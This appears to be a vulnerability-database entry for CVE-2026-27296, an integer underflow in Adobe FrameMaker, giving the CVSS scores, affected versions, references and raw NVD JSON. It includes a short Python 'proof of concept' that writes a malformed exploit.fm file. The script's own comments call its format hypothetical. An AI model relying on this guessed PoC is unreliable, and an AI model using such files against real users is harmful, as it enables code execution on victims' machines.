CVE-2026-27296

Description

Adobe Framemaker versions 2022.8 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

Adobe Framemaker <= 2022.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct

# Proof of Concept for Integer Underflow Vulnerability in Adobe Framemaker
# This script generates a malformed file that attempts to trigger an integer underflow
# by setting a length field to 0, which might be decremented during parsing.

def create_malicious_file(filename):
    with open(filename, 'wb') as f:
        # Write a generic header (hypothetical structure)
        f.write(b'FMKF')  # Magic bytes
        # Set a chunk size to 0. If the parser does size -= 4 (header), it underflows.
        malicious_size = 0x00000000
        f.write(struct.pack('<I', malicious_size))
        # Padding to simulate file content
        f.write(b'A' * 100)
    print(f"[+] Malicious file generated: {filename}")

if __name__ == "__main__":
    create_malicious_file("exploit.fm")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27296
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27296
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27296/
[4] VulDB https://vuldb.com/cve/CVE-2026-27296
[5] https://helpx.adobe.com/security/products/framemaker/apsb26-36.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27296", "sourceIdentifier": "[email protected]", "published": "2026-04-14T23:16:26.617", "lastModified": "2026-04-15T17:37:36.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Framemaker versions 2022.8 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-191"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2022.9", "matchCriteriaId": "6943B816-3A7D-47BF-9E01-DF86C9332C19"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/framemaker/apsb26-36.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}